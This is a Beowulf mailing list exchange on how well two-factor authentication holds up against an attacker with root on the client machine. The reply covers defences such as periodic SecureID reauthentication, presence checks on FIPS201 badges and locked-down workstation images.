To me this suggests that the real marginal benefit of ALL of the
two-factor authentication methods, secureid or otpw or whatever, is that
it raises the bar a tiny bit on a snooper presumed to have root control
of a system one is coming in from.  Really, just a tiny bit.  I don't
think that it would be terribly difficult to write a general purpose
network module for any operating system that could both sit in the
middle and offer up a trojan port for a third party to come in at will
and take over the "terminated" session(s) from an arbitrary
remote/breakout site.  The attacker might not have the convenience of
being able to login as you whenever they want, as the session in
question cannot be restarted once THEY choose to terminate it, but hey,
do they NEED to be able to restart it or can they do tremendous damage
at the end of the one session?  I rather think the latter.

For SecureID, you can set up your application to periodically reauthenticate 
either on a clock schedule or when you ask to do things that are particularly 
sensitive (>ftp GET "nuclear weapon release code"... Please reauthenticate..).  
 Since knowing the pseudorandom 6 digit number now doesn't help you some 60 
seconds into the future, you can make this pretty strong (at the cost of 
annoyance).

For FIPS201 badges, since they have both contact and contactless interfaces, 
you can do a strategy where the initial authentication is via the contact 
interface (which can see the crypto engine), and then you periodically ping the 
RFID part to make sure that the physical badge is still in the vicinity. (or, 
more painfully, make it so that the badge has to be always connected.. But that 
raises real usability issues with having two computers)

As always, the idea is to require both "a thing you know" and a "a thing you 
have".. The man in the middle can figure out the thing you know (e.g. By a 
spoof interface that grabs keystrokes), but it's tough to emulate the "thing 
you have", since it's behavior over time isn't predictable.


IMO a secure login from a Windows box is an oxymoron, no matter what the
authentication factors used or software interface in question might be,
but alas, I haven't yet seen questions on a due-diligence form that
mandates the non-use of Windows systems as clients permitted to access
the protected data/server.

I would qualify the Windows Box term.. If you lockdown the software 
configuration, I think one can make sure it's relatively secure.  If you allow 
casual admin access to install whatever apps you want, then, yes, it's 
insecure.  However, most banks (for example) do NOT do this, at least for 
inhouse PCs.. They rigorously control the software image (to the extent that 
you boot from a shared image over the network).. The only thing on the local 
disk is essentially a "cache" which gets compared/refreshed against the master 
image.  No sticking in random USB widgets either.. If it looks like a disk 
drive, it gets encrypted (causing wailing and gnashing of teeth for employees 
who plug their MP3 players or cameras in)


And yes, they DO have a variety of processes in place to require business 
partners to have appropriately secured systems.

Where it gets loose is the "customer contact at home" end, where they're 
trading off annoyance of customers against security.  This is like the credit 
card fraud situation.. If you lock it down, nobody will be able to use the 
card, so you trade off some losses (a few percent) against having volume.
_______________________________________________
Beowulf mailing list, [email protected]
To change your subscription (digest mode or unsubscribe) visit 
http://www.beowulf.org/mailman/listinfo/beowulf

Reply via email to